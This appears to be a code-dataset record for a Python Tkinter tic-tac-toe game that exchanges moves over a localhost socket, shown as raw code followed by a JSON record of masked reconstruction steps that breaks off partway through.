b8 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b8))
b8.grid(row=2,column=1)
b9 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b9))
b9.grid(row=2,column=2)
labels = Label(New, fg="white",bg="black", pady=1,text="Opponent Turn ",height=2,justify="center")
labels.grid(row=3,column=0)
for w in New.winfo_children():
w.configure(state="disabled")
#menu = Menu(New)
#New.config(menu=menu)
#options = Menu(menu,tearoff=False)
New.mainloop()
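# For reference, a minimal relay server this client could connect to on
# 127.0.0.1:65432 (hypothetical sketch; the real server is not part of this
# sample). It forwards each 'buttonN' token from one player to the other:
def run_relay(host='127.0.0.1', port=65432):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(2)
    p1, _ = srv.accept()
    p2, _ = srv.accept()
    def pipe(src, dst):
        while True:
            chunk = src.recv(1024)
            if not chunk:
                break
            dst.sendall(chunk)
    threading.Thread(target=pipe, args=(p1, p2), daemon=True).start()
    pipe(p2, p1)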
|
normal
|
{
"blob_id": "cc924892afe179e55166ea9b237b2bfe8ea900df",
"index": 2120,
"step-1": "<mask token>\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\n<mask token>\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\n<mask token>\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\n<mask token>\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for 
w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's 
Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\n<mask token>\n",
"step-2": "<mask token>\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\n<mask token>\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\n<mask token>\nglobal connection_established\n<mask token>\nsock.connect((HOST, PORT))\n<mask token>\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\n<mask token>\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\n<mask token>\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\n<mask token>\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and 
b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n 
b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\n<mask token>\nb1.grid(row=0, column=0)\n<mask token>\nb2.grid(row=0, column=1)\n<mask token>\nb3.grid(row=0, column=2)\n<mask token>\nb4.grid(row=1, column=0)\n<mask token>\nb5.grid(row=1, column=1)\n<mask token>\nb6.grid(row=1, column=2)\n<mask token>\nb7.grid(row=2, column=0)\n<mask token>\nb8.grid(row=2, column=1)\n<mask token>\nb9.grid(row=2, column=2)\n<mask token>\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-3": "<mask token>\nroot = Tk()\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\nwinner = False\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\nHOST = '127.0.0.1'\nPORT = 65432\nglobal connection_established\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((HOST, PORT))\nconnection_established = True\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\ncopy_of_image = image.copy()\nphoto = ImageTk.PhotoImage(image)\nlabel = ttk.Label(root, image=photo)\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\nNew = Tk()\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\nclicked = 'Y'\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and 
b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n 
b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\nb1 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b1))\nb1.grid(row=0, column=0)\nb2 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b2))\nb2.grid(row=0, column=1)\nb3 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b3))\nb3.grid(row=0, column=2)\nb4 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b4))\nb4.grid(row=1, column=0)\nb5 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b5))\nb5.grid(row=1, column=1)\nb6 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b6))\nb6.grid(row=1, column=2)\nb7 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b7))\nb7.grid(row=2, column=0)\nb8 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b8))\nb8.grid(row=2, column=1)\nb9 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b9))\nb9.grid(row=2, column=2)\nlabels = Label(New, fg='white', bg='black', pady=1, text='Opponent Turn ',\n height=2, justify='center')\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-4": "from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport time\nimport socket\nimport threading\nroot = Tk()\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\nwinner = False\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\nHOST = '127.0.0.1'\nPORT = 65432\nglobal connection_established\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((HOST, PORT))\nconnection_established = True\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\ncopy_of_image = image.copy()\nphoto = ImageTk.PhotoImage(image)\nlabel = ttk.Label(root, image=photo)\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\nNew = Tk()\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\nclicked = 'Y'\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n 
